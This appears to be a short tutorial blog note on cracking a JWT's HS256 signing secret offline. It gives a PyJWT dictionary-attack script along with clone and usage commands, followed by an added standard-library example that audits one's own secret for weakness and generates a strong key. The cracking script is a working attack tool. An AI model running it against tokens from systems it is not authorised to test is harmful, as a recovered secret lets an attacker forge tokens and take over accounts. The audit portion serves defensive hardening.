[Notes] Brute-Forcing the JWT Signing Secret

Preface

Brute-forcing the secret used to sign a JWT

Download the project

git clone https://github.com/Feiju12138/crack_jwt_signature_secret.git
cd crack_jwt_signature_secret

Source code

import sys

import jwt

if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("Usage: python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256")
        sys.exit(1)

    dict_path = sys.argv[1]
    token = sys.argv[2]
    algorithms = [sys.argv[3]]  # PyJWT expects a list of allowed algorithms

    # Check the signature only. Claim checks (exp, nbf, iat, aud, iss) run after the
    # signature has verified, so leaving them enabled would reject the correct key
    # for an expired token.
    options = {"verify_signature": True, "verify_exp": False, "verify_nbf": False,
               "verify_iat": False, "verify_aud": False, "verify_iss": False}

    with open(dict_path, encoding="utf-8", errors="ignore") as f:
        for line in f:
            candidate = line.strip()
            try:
                jwt.decode(token, key=candidate, algorithms=algorithms, options=options)
                print(f"found success: {candidate}")
                sys.exit(0)
            except jwt.exceptions.InvalidSignatureError:
                continue  # wrong key, try the next candidate
            except Exception as e:
                print(f"err: {e}")
                break
    print("found failed")

Install dependencies

pip3 install pyjwt

Brute force

dict.txt: the wordlist to use
xxx.xxx.xxx: the JWT
HS256: the signing algorithm

python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256
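
The dictionary run works because an HS256 signature is HMAC-SHA256 over `header.payload`, so any candidate key can be checked offline against a single token. As an added example (not part of the original project), the following standard-library code audits a signing secret you own against that same check and against the RFC 7518 minimum key size; `sign_hs256`, `key_matches`, `audit_secret`, `new_secret` and the wordlist are illustrative names and constructed data.

```python
import base64
import hashlib
import hmac
import json
import secrets

MIN_HS256_KEY_BYTES = 32  # RFC 7518 section 3.2: key at least as long as the hash output
CONSTRUCTED_WORDLIST = ["secret\n", "changeme\n", "jwt-signing-key\n"]  # constructed sample


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def sign_hs256(claims: dict, key: bytes) -> str:
    """Build a compact HS256 JWT using only the standard library."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def key_matches(token: str, key: bytes) -> bool:
    """True if `key` reproduces the token's signature; needs nothing but the token."""
    signing_input, _, sig = token.rpartition(".")
    expected = b64url(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())
    return hmac.compare_digest(expected, sig)


def audit_secret(key: bytes, wordlist: list[str]) -> list[str]:
    """Return findings for a signing secret we own; an empty list means no finding."""
    findings = []
    if len(key) < MIN_HS256_KEY_BYTES:
        findings.append(f"key is {len(key)} bytes, below the {MIN_HS256_KEY_BYTES}-byte minimum")
    token = sign_hs256({"sub": "audit"}, key)  # throwaway token, never leaves this process
    if any(key_matches(token, w.strip().encode()) for w in wordlist):
        findings.append("key is recoverable from the wordlist")
    return findings


def new_secret() -> bytes:
    """256 bits from the OS CSPRNG, so the key is not in any dictionary."""
    return secrets.token_bytes(MIN_HS256_KEY_BYTES)
```

Run `audit_secret` in CI or at service start-up against the configured secret, and rotate to a value from `new_secret()` if it reports anything.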

Done
